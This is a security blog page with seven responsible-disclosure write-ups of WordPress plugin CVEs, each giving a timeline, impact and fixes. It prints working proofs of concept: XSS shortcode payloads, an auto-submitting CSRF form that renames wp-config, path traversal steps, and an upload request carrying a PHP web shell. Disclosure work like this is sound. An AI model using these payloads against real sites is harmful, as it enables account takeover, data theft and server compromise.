Category: Security issues

  • CVE-2023-4646 – Simple Posts Ticker < 1.1.6 - Contributor + Stored XSS via shortcode

    CVE-2023-4646 – Simple Posts Ticker < 1.1.6 - Contributor + Stored XSS via shortcode

    While examining the plugin during the testing phase, we uncovered a vulnerability that enables the execution of Stored Cross-Site Scripting (XSS) attacks, accomplished by incorporating a shortcode into a new post. This vulnerability has the potential to lead to the compromise of user accounts, particularly those of contributors.

    Main info:

    CVECVE-2023-4646
    PluginSimple Posts Ticker
    CriticalHigh
    Publicly PublishedSeptember 25, 2023
    Last UpdatedSeptember 25, 2023
    ResearcherDmtirii Ignatyev
    OWASP TOP-10A7: Cross-Site Scripting (XSS)
    PoCYes
    ExploitWill be later
    Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4646
    https://wpscan.com/vulnerability/c34f8dcc-3be6-44ad-91a4-7c3a0ce2f9d7
    Plugin Security Certification by CleanTalk

    Timeline

    August 18, 2023Plugin testing and vulnerability detection in the Simple Posts Ticker plugin have been completed
    August 18, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    September 18, 2023The author has released a fix update
    September 25, 2023Registered CVE-2023-4646

    Discovery of the Vulnerability

    While conducting an extensive plugin security assessment, a critical vulnerability was uncovered in the Simple Posts Ticker plugin. Specifically, this vulnerability allows an attacker to execute Stored Cross-Site Scripting (XSS) attacks by utilizing a shortcode within a new post. Importantly, this flaw can be exploited by contributors or users with higher privileges and could potentially lead to unauthorized account access.

    Understanding of Stored XSS attack’s

    Stored Cross-Site Scripting (XSS) is a type of security vulnerability where malicious scripts are inserted into a web application and stored for later execution when accessed by other users. In the context of this vulnerability, attackers can leverage shortcodes to store and execute malicious JavaScript code.

    Exploiting the Stored XSS

    Exploiting the Stored XSS vulnerability within the Simple Posts Ticker plugin necessitates the insertion of malicious code within a shortcode by an attacker with contributor-level or higher privileges. The inserted code can include payloads designed to steal user data, impersonate users, or execute actions on behalf of the compromised contributor account. Attackers can create deceptive posts that, when viewed, execute the malicious script.

    POC shortcode:

    [spt-posts-ticker label_text_size=’” onmouseover=”alert(/XSS/)”‘ label_text=”123123″]

    This is shortcode which you can add to new post

    Despite requiring contributor-level privileges, CVE-2023-4646 poses significant risks. An attacker who successfully exploits this vulnerability can:

    • Execute arbitrary code within the context of other users’ browsers.
    • Steal sensitive data like cookies or session information.
    • Gain unauthorized access to the compromised contributor’s account.
    • Impersonate contributors to perform malicious actions on the website.

    In a real-world scenario, envision an attacker leveraging this vulnerability to compromise a contributor’s account on a website employing the Simple Posts Ticker plugin. By embedding a malicious shortcode in a seemingly innocuous post, they can execute an XSS attack on anyone who views the manipulated content. This could result in unauthorized account access, data breaches, and damage to the website’s reputation.

    Recommendations for Improved Security

    To mitigate the risks posed by CVE-2023-4646 and bolster the overall security of WordPress websites utilizing the Simple Posts Ticker plugin, consider the following recommendations:

    • Plugin updates: Ensure the Simple Posts Ticker plugin is kept up to date, specifically to version 1.1.6 or later, which should contain a patch addressing this vulnerability.
    • Input validation and sanitization: Developers should implement rigorous input validation and data sanitization to prevent the injection of malicious code through shortcodes or other user inputs.
    • Least privilege principle: Restrict the capabilities and permissions of contributors and other user roles to minimize the potential impact of a compromised account.
    • Routine security assessments: Regularly conduct security audits and penetration testing to proactively identify and address vulnerabilities.
    • User education: Educate contributors and administrators about potential security threats and best practices for securely using and managing plugins and shortcodes.

    By adhering to these recommendations, website administrators can significantly reduce the risk of Stored XSS attacks and enhance the overall security posture of their WordPress installations, even for vulnerabilities that may require contributor-level privileges.

    #WordPressSecurity #StoredXSS #WebsiteSafety #StayProtected #HighVulnerability

    Use CleanTalk solutions to improve the security of your website

    Dmitrii i.

    If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


    Check my website

  • CVE-2023-4798 – User Avatar – Reloaded < 1.2.2 - Contributor+ Stored XSS

    CVE-2023-4798 – User Avatar – Reloaded < 1.2.2 - Contributor+ Stored XSS

    During the plugin’s testing phase, a vulnerability was identified that enables the execution of Stored XSS by an attacker who embeds a shortcode in a new post, potentially leading to an account takeover.

    Main info:

    CVECVE-2023-4798
    PluginUser Avatar – Reloaded
    CriticalHigh
    Publicly PublishedSeptember 25, 2023
    Last UpdatedSeptember 25, 2023
    ResearcherDmtirii Ignatyev
    OWASP TOP-10A7: Cross-Site Scripting (XSS)
    PoCYes
    ExploitWill be later
    Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4798
    https://wpscan.com/vulnerability/273a95bf-39fe-4ba7-bc14-9527acfd9f42
    Plugin Security Certification by CleanTalk

    Timeline

    August 22, 2023Plugin testing and vulnerability detection in the User Avatar – Reloaded access plugin have been completed
    August 22, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    September 22, 2023The author has released a fix update
    September 25, 2023Registered CVE-2023-4798

    Discovery of the Vulnerability

    While conducting a security assessment of the User Avatar – Reloaded plugin, a critical vulnerability was identified. This vulnerability allows for the execution of Stored Cross-Site Scripting (XSS) attacks, carried out on behalf of a contributor-level user by embedding a malicious shortcode within a new post. This security flaw poses a significant threat as it enables attackers to gain control over user accounts and potentially compromise the integrity of the website.

    Understanding of Stored XSS attack’s

    Stored Cross-Site Scripting (XSS) is a type of security vulnerability that occurs when an application does not properly validate and sanitize user inputs. It allows an attacker to inject malicious scripts into a website, which are then stored and executed when other users view the affected content. This can lead to a range of malicious actions, including data theft, session hijacking, or even complete website compromise.

    Exploiting the Stored XSS

    Exploiting the Stored XSS vulnerability in the User Avatar – Reloaded plugin involves an attacker with contributor-level access inserting malicious code within a shortcode. This code can include payloads designed to steal user cookies, impersonate users, or perform actions on behalf of the compromised contributor account. Attackers can craft convincing phishing attempts, potentially leading to the compromise of sensitive data and accounts.

    POC shortcode:

    [avatar user=”admin” size=”96″ align=”left” link=’” onmouseover=”alert(/XSS/)”‘ /]

    This is shortcode which you can add to new post

    The potential risks associated with CVE-2023-4798 are substantial. An attacker could compromise the accounts and privacy of contributors and potentially escalate their access to perform more malicious actions. This could include posting harmful content, stealing user data, or manipulating website functionality.

    In a real-world scenario, imagine an attacker gaining access to a contributor-level account on a website using the User Avatar – Reloaded plugin. By embedding a malicious shortcode in a post, they can target and compromise the accounts of unsuspecting users who view the manipulated content. This could lead to unauthorized access, data breaches, and a loss of trust in the website’s security.

    Recommendations for Improved Security

    To mitigate the risk posed by CVE-2023-4798 and enhance the overall security of WordPress websites using the User Avatar – Reloaded plugin, the following recommendations should be considered:

    • Update the plugin: Website administrators should promptly update the User Avatar – Reloaded plugin to version 1.2.2 or later, which should include a patch to address this vulnerability.
    • Input validation: Developers should implement robust input validation and output encoding to prevent malicious code injection through shortcodes or other user inputs.
    • User privilege management: Limit contributors’ capabilities and restrict access to critical functionalities, reducing the potential damage caused by compromised contributor accounts.
    • Regular security audits: Conduct routine security audits and penetration testing on your WordPress website to identify and address vulnerabilities proactively.
    • User awareness and education: Train contributors and administrators to recognize potential security threats, emphasizing the importance of safe shortcode usage and adherence to security best practices.

    By following these recommendations, website owners can significantly reduce the risk of Stored XSS attacks and enhance the overall security posture of their WordPress installations.

    #WordPressSecurity #StoredXSS #WebsiteSafety #StayProtected #HighVulnerability

    Use CleanTalk solutions to improve the security of your website

    Dmitrii i.

    If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


    Check my website

  • CVE-2023-4933 – WP Job Openings < 3.4.3 – Sensitive Data Exposure via Directory Listing

    CVE-2023-4933 – WP Job Openings < 3.4.3 – Sensitive Data Exposure via Directory Listing

    During testing, a critical vulnerability was discovered in the plugin, namely a vulnerability in the Directory Listings system, which allows an unauthorized user to view and download private files of other users. This vulnerability poses a serious security threat because it allows an attacker to gain access to confidential data and files of other users without their permission.

    Main info:

    CVECVE-2023-4933
    PluginWP Job Openings
    CriticalHigh
    Publicly PublishedSeptember 25, 2023
    Last UpdatedSeptember 25, 2023
    ResearcherDmtirii Ignatyev
    OWASP TOP-10A3: Sensitive Data Exposure
    PoCYes
    ExploitWill be later
    Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4933
    https://wpscan.com/vulnerability/882f6c36-44c6-4273-81cd-2eaaf5e81fa7
    Plugin Security Certification by CleanTalk

    Timeline

    September 13, 2023Plugin testing and vulnerability detection in the WP Job Openings access plugin have been completed
    September 13, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    September 20, 2023The author has released a fix update
    September 25, 2023Registered CVE-2023-4933

    Discovery of the Vulnerability

    While conducting a comprehensive security assessment of the WP Job Openings plugin, a critical vulnerability was identified in its Directory Listings system. This vulnerability allows unauthorized users to access and download private files belonging to other users. This security flaw is of utmost concern as it enables attackers to gain access to sensitive data and files without any authorization.

    Understanding of Directory Listing attack’s

    Directory Listing, in the context of web servers, refers to the practice of displaying the contents of a directory when an index file (like index.html or index.php) is absent. Without proper security measures in place, this can lead to unintended exposure of files and directories to anyone who accesses the directory through a web browser. For example, if an attachment directory doesn’t have an index file and the web server’s autoindex feature is enabled, it may display a list of files and directories to visitors.

    Imagine a scenario where the WP Job Openings plugin stores attachments related to job applications in a directory without proper access controls or an index file. If an attacker knows or guesses the directory’s path, they can easily view and download attachments submitted by other users.

    Exploiting the Directory Listing

    Exploiting the Directory Listing vulnerability in WP Job Openings requires little technical skill. An attacker needs to:

    • Identify the target directory where attachments are stored, often through educated guesses or publicly available information.
    • Use a web browser to access the directory directly.
    • If the directory listing is enabled and lacks proper access controls, the attacker can view and download files belonging to other users.

    This straightforward process allows attackers to access private attachments and potentially expose sensitive information, such as resumes, cover letters, and personal details submitted by job applicants.

    POC:

    1. You can find directory listing inside this URL http://your_site/wordpress/wp-content/uploads/awsm-job-openings/2023/09/

    Potential Risks and Real-World Impact

    The potential risks associated with CVE-2023-4933 are substantial. An attacker could compromise the privacy and confidentiality of job applicants by accessing their personal documents. In addition, sensitive corporate data, including resumes, contact information, and internal job-related documents, may also be exposed.

    In a real-world scenario, consider an attacker who accesses a directory storing job application attachments through the vulnerability in the WP Job Openings plugin. They may use the gathered information for malicious purposes, such as identity theft, spear-phishing, or selling sensitive data on the dark web. Furthermore, if the affected organization handles highly regulated data (e.g., personal health information or financial records), this exposure could lead to legal and compliance issues.

    Recommendations for Improved Security

    To mitigate the risk posed by CVE-2023-4933 and enhance the overall security of WordPress websites using the WP Job Openings plugin, the following recommendations should be followed:

    1. Update the plugin: Website administrators should promptly update the WP Job Openings plugin to version 3.4.3 or later, which should include a patch to address this vulnerability.
    2. Implement access controls: Developers should configure proper directory permissions and access controls to prevent unauthorized directory listings and file access.
    3. Disable directory listing: Ensure that directory listing is disabled in the web server’s configuration, especially for directories containing sensitive data.
    4. Security monitoring: Implement continuous security monitoring to detect and respond to potential vulnerabilities or attacks promptly.
    5. Regular audits: Perform routine security audits and penetration testing to identify and address security weaknesses in WordPress plugins and themes.

    By following these recommendations, website owners can significantly reduce the risk of sensitive data exposure through directory listings and enhance the overall security posture of their WordPress installations.

    #WordPressSecurity #DirectoryListing #WebsiteSafety #StayProtected #HighVulnerability

    Use CleanTalk solutions to improve the security of your website

    Dmitrii i.

    If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


    Check my website

  • CVE-2023-4289 – WP Matterport Shortcode < 2.1.8 - Contributor+ Stored XSS via shortcode

    CVE-2023-4289 – WP Matterport Shortcode < 2.1.8 - Contributor+ Stored XSS via shortcode

    In the process of testing the plugin, a vulnerability was found that allows you to implement Stored XSS on behalf of the contributor by embedding the shortcode in a new post, which entails account takeover

    Main info:

    CVECVE-2023-4289
    PluginWP Matterport Shortcode
    CriticalHigh
    Publicly PublishedSeptember 25, 2023
    Last UpdatedSeptember 25, 2023
    ResearcherDmtirii Ignatyev
    OWASP TOP-10A7: Cross-Site Scripting (XSS)
    PoCYes
    ExploitWill be later
    Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4289
    https://wpscan.com/vulnerability/38c337c6-048f-4009-aef8-29c18afa6fdc
    Plugin Security Certification by CleanTalk

    Timeline

    August 7, 2023Plugin testing and vulnerability detection in the WP Matterport Shortcode plugin have been completed
    August 7, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    September 20, 2023The author has eliminated the vulnerability and patched his plugin
    September 25, 2023Registered CVE-2023-4289

    Discovery of the Vulnerability

    During the process of plugin testing, a vulnerability was uncovered in WP Matterport Shortcode. This vulnerability allows for the execution of Stored Cross-Site Scripting (XSS) attacks, carried out on behalf of a contributor-level user by embedding a malicious shortcode within a new post. This security flaw could potentially lead to account takeover and poses a significant threat to website security.

    Understanding Cross-Site Scripting (XSS)

    Stored Cross-Site Scripting (XSS) is a type of security vulnerability that occurs when an application does not properly validate user inputs and subsequently renders malicious scripts within a web page or application. In the context of this vulnerability, a contributor can inject harmful code via a shortcode that remains stored on the website server. When unsuspecting users view the compromised content, the malicious script is executed within their browsers, allowing attackers to steal sensitive information, impersonate users, or carry out other malicious actions.

    Exploiting the Stored Cross-Site Scripting (XSS) vulnerability

    Exploiting the Stored XSS vulnerability in WP Matterport Shortcode involves an attacker with contributor-level access inserting malicious code within a shortcode. This code could include payloads to steal user cookies, redirect users to malicious websites, or perform actions on behalf of the compromised contributor account. Attackers can craft convincing phishing attempts, compromising the security and trustworthiness of the affected website.

    POC shortcode:

    [matterport cols=”3″ src=”https://wordpress.org/plugins/shortcode-gallery-for-matterport-showcase/uKDy9xrMRCi,wV4vX743ATF” width=’900 ” onmouseover=”alert(12312123312)’]

    This shortcode can be inserted into a new post

    Potential Risks and Real-World Impact

    The potential risks associated with this vulnerability are significant. An attacker could use the compromised contributor account to post malicious content or links, thereby damaging the reputation of the website. Furthermore, if the compromised contributor has higher privileges, the attacker may escalate their access to perform more malicious actions, such as deleting content or gaining administrative control.

    In a real-world scenario, a contributor’s account could be taken over by an attacker who injects a rogue shortcode into a post. Unsuspecting visitors to the site may then fall victim to the XSS attack, leading to a breach of their personal data or exposure to harmful content.

    1. Unauthorized Data Access:
      Attackers could exploit the XSS vulnerability to steal sensitive user data, such as login credentials or personal information.
    2. Cookie Theft:
      Malicious scripts could hijack user cookies, leading to unauthorized access to user accounts or session hijacking. After account takeover attacker can insert malicious PHP code on page and it will be RCE.
    3. Malicious Content Distribution:
      Attackers might use the vulnerability to inject harmful content or links into the website, potentially damaging the site’s reputation or spreading malware.

    Recommendations for Improved Security

    To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

    • Update to the latest version:
      Website administrators should ensure that the WP Matterport Shortcode plugin is updated to the latest patched version, as the vendor may have already addressed this vulnerability.
    • Input Validation and Escaping:
      Plugin developers must implement robust input validation and escaping mechanisms to ensure that all user-generated content, including shortcodes, is properly sanitized before rendering on the page.
    • Regular Security Audits:
      Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
    • User Privilege Restriction:
      Implement strict access controls to ensure that users can only access information that they are authorized to view based on their roles and permissions.
    • User Awareness:
      Educate website administrators and users about the risks of sharing sensitive information and the importance of strong, unique passwords.

    By following these recommendations, website owners can reduce the risk of XSS attacks and enhance the overall security posture of their WordPress installations.

    Use CleanTalk solutions to improve the security of your website

    Dmitrii i.

    If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


    Check my website

  • CVE-2023-4827 – File Manager Pro < 1.8 - Remote Code Execution via CSRF

    CVE-2023-4827 – File Manager Pro < 1.8 - Remote Code Execution via CSRF

    During testing of the plugin, a CSRF vulnerability was discovered in action=rename, which can lead to denial of service and theft of the password from the database, thereby allowing an attacker to get inside the web application and gain a foothold in it. Replace any data in the database and do everything that an administrator can do. After logging into the database, he can create a new user and attach a hashed password to it. And through the administrator to implement RCE remote code execution

    Main info:

    CVECVE-2023-4827
    PluginFile Manager Pro
    CriticalVery High
    Publicly PublishedSeptember 12, 2023
    Last UpdatedSeptember 12, 2023
    ResearcherDmtirii Ignatyev
    OWASP TOP-10A2: Broken Authentication and Session Management
    PoCYes
    ExploitWill be later
    Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4827
    https://wpscan.com/vulnerability/d4daf0e1-8018-448a-964c-427a355e005f
    Plugin Security Certification by CleanTalk

    Timeline

    August 25, 2023Plugin testing and vulnerability detection in the File Manager Pro access plugin have been completed
    August 25, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    September 8, 2023The author has released a fix update
    September 8, 2023Registered CVE-2023-4827

    Discovery of the Vulnerability

    In the ever-evolving landscape of web security, the discovery of vulnerabilities is a critical aspect of keeping online systems safe. Recently, a noteworthy vulnerability, identified as CVE-2023-4827, was uncovered in File Manager Pro, specifically in versions prior to 1.8. This vulnerability poses a significant risk to web applications utilizing this plugin.

    The vulnerability was first identified during a routine security assessment of the File Manager Pro plugin. It was categorized as a Cross-Site Request Forgery (CSRF) vulnerability, which, when exploited, could lead to remote code execution (RCE) on the affected web application.

    Understanding of CSRF attack’s

    Before delving into the specifics of this vulnerability, it’s crucial to understand what CSRF is and how it operates. CSRF, or Cross-Site Request Forgery, is a type of attack where an attacker tricks a user into executing actions on a web application without their consent. Essentially, it involves the exploitation of a user’s authenticated session to perform actions without their knowledge.

    To illustrate this, imagine a scenario where an authenticated user is tricked into clicking a seemingly innocent link on a malicious website. This link sends a request to a target web application where the user is logged in, executing actions as if they initiated them themselves.

    Exploiting the CSRF

    In the case of CVE-2023-4827, the vulnerability was discovered in the “action=rename” feature of File Manager Pro. This vulnerability allows an attacker to craft a malicious CSRF request that forces an authenticated user to rename a file. While this may seem relatively benign at first glance, it has the potential for devastating consequences.

    By exploiting this CSRF vulnerability, an attacker can initiate a series of actions leading to a remote code execution (RCE) scenario. They can gain control over the web application, potentially extracting sensitive information from the database, altering data, or even creating new users with hashed passwords. The attacker can effectively assume the privileges of an administrator and manipulate the application as they see fit.

    POC html code:

    <html> 

      <body> 

      <script>history.pushState(”, ”, ‘/’)</script> 

        <form action=”http://127.0.0.1/wordpress/wp-admin/admin-ajax.php”> 

          <input type=”hidden” name=”action” value=”fs&#95;connector” /> 

          <input type=”hidden” name=”cmd” value=”rename” /> 

          <input type=”hidden” name=”name” value=”wp&#45;config&#46;txt” /> 

          <input type=”hidden” name=”target” value=”l1&#95;d3AtY29uZmlnLnBocA” /> 

          <input type=”submit” value=”Submit request” /> 

        </form> 

        <script> 

          document.forms[0].submit(); 

        </script> 

      </body> 

    </html>

    Potential Risks and Real-World Impact

    The potential risks associated with this vulnerability are significant. In a real-world scenario, an attacker could use CSRF to exploit File Manager Pro, gain access to a web application’s database, and compromise its security. They could then exfiltrate sensitive data, modify critical settings, or inject malicious code, potentially causing data breaches or service disruptions. Moreover, the attacker could establish persistent access, allowing them to maintain control over the application, leading to long-term security concerns.

    Recommendations for Improved Security

    To mitigate the risk associated with CVE-2023-4827 and similar CSRF vulnerabilities, several security measures should be considered:

    1. Update and Patch: It is crucial to keep all software, including plugins and themes, up to date. Developers often release patches to address security vulnerabilities.
    2. CSRF Protection: Implement robust CSRF protection mechanisms, such as anti-CSRF tokens, to ensure that requests are only executed when initiated by legitimate users.
    3. Security Audits: Regular security audits and penetration testing can help identify and address vulnerabilities before they can be exploited.
    4. Least Privilege Principle: Restrict user privileges to the minimum required for their tasks to limit potential damage in the event of a breach.

    In conclusion, CVE-2023-4827 serves as a stark reminder of the importance of maintaining vigilance in the ever-evolving landscape of cybersecurity. By understanding CSRF and taking proactive steps to secure web applications, developers and administrators can minimize the risks associated with such vulnerabilities and protect their systems from potential exploitation.

    #WordPressSecurity #CSRF #WebsiteSafety #StayProtected #VeryHighVulnerability

    Use CleanTalk solutions to improve the security of your website

    Dmitrii i.

    If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


    Check my website

  • CVE-2023-3664 – FileOrganizer

    CVE-2023-3664 – FileOrganizer <= 1.0.2 - Admin+ Arbitrary File Access

    During a security assessment of the FileOrganizer plugin, a medium vulnerability was uncovered in versions up to and including 1.0.2. This vulnerability allows an attacker to manipulate the plugin’s root folder, potentially compromising the security of the entire system. The plugin does not restrict functionality on multisite instances, allowing site admins to gain full control over the server.

    Main info:

    CVECVE-2023-3664
    PluginFileOrganizer
    CriticalMedium
    Publicly PublishedSeptember 3, 2023
    Last UpdatedSeptember 3, 2023
    ResearcherDmtirii Ignatyev
    OWASP TOP-10A5: Broken Access Control
    PoCYes
    ExploitWill be later
    Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3664
    https://wpscan.com/vulnerability/d59e6eac-3ebf-40e0-800c-8cbef345423f
    Plugin Security Certification by CleanTalk

    Timeline

    July 11, 2023Plugin testing and vulnerability detection in the FileOrganizer access plugin have been completed
    July 12, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    September 3, 2023The author has not released an update
    September 3, 2023Registered CVE-2023-3664

    Discovery of the Vulnerability

    During testing, it was discovered that it is possible to change the root folder that the plugin will read and show information to the user. Usually in such plugins there is a restriction on exiting the /var/www/html directory, but in this plugin the root folder can be changed to any operating system directory like /home. And you can also perform the same actions using Path Traversal /var/www/html/../../../etc or /home and so on

    Understanding of Path Traversal attack’s

    Path Traversal is a type of vulnerability that occurs when an application allows users to navigate outside the intended directory structure. In the case of FileOrganizer, the plugin lacks proper validation, enabling an attacker to traverse directories beyond the expected boundaries.

    For instance, if the plugin expects files to be within the /var/www/html directory, an attacker can use path traversal techniques to access directories like /home, /etc, or even ../../../../../, which could lead to unauthorized access to sensitive files and system resources.

    Exploiting the Path Traversal

    Exploiting this vulnerability involves crafting malicious requests that contain directory traversal sequences, such as “../” or “%2e%2e%2f”, to trick the plugin into accessing files and directories outside its intended scope. This allows the attacker to view, modify, or exfiltrate sensitive files.

    POC:

    1. Go to settings page of this plugin

    2. Change directory to /home or you can use Path Traversal /var/www/html/../../../home or /var/www/html/wordpress/../../../../etc

    3. Then navigate to the page of plugin

    4. You will be able to list the files/folders outside of WordPress root directory

    Potential Risks and Real-World Impact

    The impact of this vulnerability is significant:

    1. Unauthorized Data Access: Attackers can access and potentially steal sensitive files, including configuration files, user data, and other confidential information.
    2. System Compromise: An attacker could use this vulnerability to compromise the entire system, execute arbitrary code, or manipulate critical files.
    3. Data Loss: Files may be deleted, altered, or accessed without authorization, leading to data loss and system instability.

    Recommendations for Improved Security

    To mitigate the risks associated with CVE-2023-3664 and enhance the security of the FileOrganizer plugin, the following measures are strongly advised:

    1. Regular Updates: Keeping software, applications, and plugins up to date helps patch known vulnerabilities that attackers could exploit for Path Traversal.
    2. Input Validation: Implement thorough input validation and sanitization to prevent path traversal attacks and unauthorized file access.
    3. Access Controls: Implement proper access controls to restrict file access based on user privileges.
    4. Web Application Firewalls (WAFs) and Security Plugins: Implementing WAFs or Security Plugins can help detect and prevent Path Traversal attempts by filtering malicious inputs. You can use a very powerful and multifunctional Security & Malware scan by CleanTalk, which will protect your site from such attacks and your site will always be readable

    By addressing the path traversal vulnerability in the FileOrganizer plugin and following these security recommendations, website owners can significantly reduce the likelihood of security breaches and protect the integrity of their data and systems.

    #WordPressSecurity #PathTraversal #WebsiteSafety #StayProtected #MediumVulnerability

    Use CleanTalk solutions to improve the security of your website

    Dmitrii i.

    If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


    Check my website

  • CVE-2023-4238 – Prevent files / folders access < 2.5.2 - Remote Code Execution

    CVE-2023-4238 – Prevent files / folders access < 2.5.2 - Remote Code Execution

    A severe security loophole has come to light in the Prevent files / folders access plugin, triggering concerns over the safety of WordPress websites. This vulnerability, tracked as CVE-2023-4238, opens the door to remote code execution through file uploads. Our testing revealed a startling scenario: an attacker can potentially upload a PHP file to the private directory at /wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory.

    The plugin’s inclusion of a function for privilege elevation is noteworthy. If an attacker obtains < Admin privileges, they could exploit ordinary users to facilitate this unauthorized upload.

    Main info:

    CVECVE-2023-4238
    PluginPrevent files / folders access
    CriticalVery High
    Publicly PublishedAugust 31, 2023
    Last UpdatedAugust 31, 2023
    ResearcherDmtirii Ignatyev
    OWASP TOP-10A05: Security Misconfiguration
    PoCYes
    ExploitWill be later
    Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4238
    https://wpscan.com/vulnerability/53816136-4b1a-4b7d-b73b-08a90c2a638f
    Plugin Security Certification by CleanTalk

    Timeline

    July 13, 2023Plugin testing and vulnerability detection in the Prevent files / folders access plugin have been completed
    July 13, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    August 27, 2023The author has released a fix update
    August 31, 2023Registered CVE-2023-4238

    Discovery of the Vulnerability

    During our meticulous examination of the plugin, we identified a critical flaw that exposes websites to remote code execution. This vulnerability allows an attacker to upload malicious PHP files to a specific directory, providing a gateway for executing arbitrary commands on the target system.

    Understanding of Remote Code Execution attack’s

    Remote Code Execution (RCE) is a sophisticated cyber attack that poses significant threats to the security of software applications, web servers, and online platforms. This type of attack enables malicious actors to execute arbitrary code on a target system, often leading to a complete compromise of the system’s functionality and data.

    How Remote Code Execution Works:

    1. Vulnerability Exploitation: RCE attacks typically exploit vulnerabilities in an application’s code, often resulting from poor input validation, inadequate user authentication, or insecure configurations. Attackers seek ways to inject their own malicious code into the target system.
    2. Command Execution: Once the attacker succeeds in injecting malicious code, they can execute arbitrary commands on the target system. These commands might include shell commands, operating system functions, or other actions that can compromise the system’s security.
    3. Unauthorized Access: RCE allows attackers to gain unauthorized access to the server environment, enabling them to manipulate files, databases, and other resources. This unauthorized access can result in data breaches, data loss, and unauthorized control of the system.

    Exploiting the Remote Code Execution

    In the context of the Prevent files / folders access plugin, an attacker can exploit the lack of proper validation and restrictions on file uploads. By injecting malicious PHP code into a file, they can upload it to the private directory. Upon execution, this file can trigger unauthorized commands, thereby compromising the entire web application.

    POC:

    1) Need to go to /wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory

    2) Then upload a file with the php extension

    3) Follow the link http://your_host/wordpress/wp-content/uploads/protectedfiles/{filename}.php

    POC request:

    POST /wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory HTTP/1.1

    Host: your_host

    User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

    Accept-Language: en-US,en;q=0.5

    Accept-Encoding: gzip, deflate

    Referer: http://your_host/wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory

    Content-Type: multipart/form-data; boundary=—————————1997636327839669212858654260

    Content-Length: 748

    Origin: http://your_host

    Connection: close

    Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1689481588%7Cyy6JhGzsFzCgNGZrPBtXmLggeJYWnERQGSgti68YGZK%7C778d0436fcf72095251ba6a1f0020fe28af9d706771d93c24bc4fdd5e96ab3c0; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1689481588%7Cyy6JhGzsFzCgNGZrPBtXmLggeJYWnERQGSgti68YGZK%7C5b4086f33c562500a9c62e1028af758fe8630a9991847cf93ff7a1265c9d9777; wp-settings-1=libraryContent%3Dbrowse%26siteorigin_panels_setting_tab%3Dwelcome; wp-settings-time-1=1689308788

    Upgrade-Insecure-Requests: 1

    Sec-Fetch-Dest: document

    Sec-Fetch-Mode: navigate

    Sec-Fetch-Site: same-origin

    Sec-Fetch-User: ?1

    —————————–1997636327839669212858654260

    Content-Disposition: form-data; name=”mo_media_restriction_file_upload_field”

    cff450153b

    —————————–1997636327839669212858654260

    Content-Disposition: form-data; name=”_wp_http_referer”

    /wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory

    —————————–1997636327839669212858654260

    Content-Disposition: form-data; name=”fileToUpload”; filename=”cmd.php”

    Content-Type: application/x-php

    <?php system($_GET[‘cmd’]); ?>

    —————————–1997636327839669212858654260

    Content-Disposition: form-data; name=”option”

    mo_media_restriction_file_upload

    —————————–1997636327839669212858654260–

    Potential Risks and Real-World Impact

    The gravity of this vulnerability cannot be understated. An attacker who successfully leverages this RCE vulnerability gains the ability to execute operating system commands, potentially leading to the complete compromise of the web application, data theft, and unauthorized control of the server environment.

    1. Data Breaches: Attackers can exfiltrate sensitive data from compromised systems. This might include personal information, financial data, proprietary business information, and more.
    2. System Compromise: RCE attacks can lead to complete control of the target system. Attackers can modify files, install malware, and even escalate their privileges to gain control over the entire server.
    3. Malicious Payload: Attackers can deliver payloads that create backdoors or install malware, allowing them to maintain persistent access to the compromised system even after the initial attack.

    Recommendations for Improved Security

    To mitigate the risks associated with CVE-2023-4238 and enhance overall security, we strongly recommend the following measures:

    1. Regular Updates: Keeping software, applications, and plugins up to date helps patch known vulnerabilities that attackers could exploit for RCE.
    2. Input Validation: Thoroughly validate and sanitize all user inputs to prevent injection attacks and unauthorized code execution.
    3. Secure Coding Practices: Developers should follow secure coding practices, use proper input validation, avoid executing user-supplied code, and implement principle of least privilege.
    4. Web Application Firewalls (WAFs) and Security Plugins: Implementing WAFs or Security Plugins can help detect and prevent RCE attempts by filtering malicious inputs. You can use a very powerful and multifunctional Security & Malware scan by CleanTalk, which will protect your site from such attacks and your site will always be readable
    5. User Education: Educate users about the risks of executing code from untrusted sources and encourage them to avoid opening suspicious emails or downloading files from unknown sources.

